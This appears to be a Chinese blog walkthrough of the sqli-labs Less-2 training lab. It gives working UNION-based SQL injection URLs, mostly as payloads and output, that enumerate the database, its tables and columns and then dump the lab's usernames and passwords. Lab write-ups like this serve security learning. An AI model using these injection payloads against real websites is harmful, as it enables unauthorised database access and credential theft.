当前位置: 首页 > news >正文

sqli-labs第二关

1.进入页面的图像如下:

2.开始尝试id,然后尝试1and1这种固定做法

http://127.0.0.1:8081/Less-2/?id=1

Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb

得到name喝password的信息

然后:换成id=111111

发现页面报错这就存在注入点

3.开始查询列数

Welcome    Dhakkan
Unknown column '4' in 'order clause'

http://127.0.0.1:8081/Less-2/?id=1%20order%20by%203得到了列数是3

4.联合注入

http://127.0.0.1:8081/Less-2/?id=1%20union%20select%201,2,3为了得到后面的信息将1换成-1

Welcome    Dhakkan
Your Login name:2
Your Password:3

5.开始查询他里面的库,列等等信息

数据库版本version()

数据库名称database()

数据库用户user()

操作系统@@version_compile_os

http://127.0.0.1:8081/Less-2/?id=-1%20union%20select%201,version(),database()

Welcome    Dhakkan
Your Login name:5.7.26
Your Password:security

得到version():5.7.26,database():security

http://127.0.0.1:8081/Less-2/?id=-1%20union%20select%201,user(),@@version_compile_os

Welcome    Dhakkan
Your Login name:root@localhost
Your Password:Win64

user():root@localhost  @@version_compile_os:win64

6.查询库下面的表

如果版本低就直接暴力查询:sqlmap

如果版本高就是采用information_schema语句来得到相关的信息

已知道库是:security

http://127.0.0.1:8081/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'

Welcome    Dhakkan
Your Login name:2
Your Password:emails,referers,uagents,users

7.得到相关的库:emalis,referes,uagents,users

接着找security库下面相关列的数据

http://127.0.0.1:8081/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security'

Welcome    Dhakkan
Your Login name:2
Your Password:id,email_id,id,referer,ip_address,id,uagent,ip_address,username,id,username,password

8.发现了这些数据查询security数据库下users表的列名---id,username,password

http://127.0.0.1:8081/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from users

Welcome    Dhakkan
Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

发现了多个数据,把from security.users

Welcome    Dhakkan
Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

http://127.0.0.1:8081/Less-2/?id=-1 union select 1,group_concat(id),group_concat(password) from security.users

Welcome    Dhakkan
Your Login name:1,2,3,4,5,6,7,8,9,10,11,12,14
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

这道题目就能得到:

数据库:security

表:emalis,referes,uagents,users

列:id,username,password

id:1,2,3,4,5,6,7,8,9,10,11,12,14

password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

username:Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

打开数据库查看:满足查询的语句的结果

http://www.dtcms.com/a/524302.html

相关文章:

  • 大数据Spark(七十):Transformation转换算子cogroup和zip使用案例
  • Drools在java中的使用
  • 【办公类-121-02】20251024淘宝视频红包(UIBOT点击“左箭头”“视频”“消息”切换)
  • 9 种高级 RAG 技术及其实现方法
  • 计算机网络面试核心知识点大全
  • 做网站建站现在什么传奇最火电脑版
  • C语言需要掌握的基础知识点之图
  • 做一个类似京东的网站海外注册公司
  • python舆情分析可视化系统 情感分析 微博 爬虫 scrapy爬虫技术 朴素贝叶斯分类算法大数据 计算机✅
  • 压缩与缓存调优实战指南:从0到1根治性能瓶颈(六)
  • 做百度手机网站优化点asp网站制作教程
  • element+vue3 table上下左右键切换input和select
  • 元萝卜 1.0.27| 免Root,XP模块框架,支持应用多开分身,一键微信平板模式
  • 长春企业网站seo珠海企业官网设计制作
  • MySQL 函数详细说明
  • 《Memcached 连接:深入理解与优化实践》
  • C++ EigenSolver无优化模式下报错分析
  • 数据结构——折半插入排序
  • io_uring 快吗? Postgres 17 与 18 的基准测试
  • 国产数据库替代MongoDB:政务电子证照新选择
  • 甘孜建设网站集团响应式网站建设
  • 枸杞网站建设方案2024年即将上市的手机
  • Git 版本回退 reset --mixed 命令
  • 博途DWORD中包含word ,字节,位的关系
  • Java Character 类详解
  • 【数据结构】队列“0”基础知识讲解 + 实战演练
  • 【生活】秋冬季节,鼻子很干结痂,扣掉鼻孔干痂流血,鼻塞等护理方法
  • 网站关键词公司百度关键词查询
  • 大模型通识
  • 346. 执行操作后元素的最高频率 I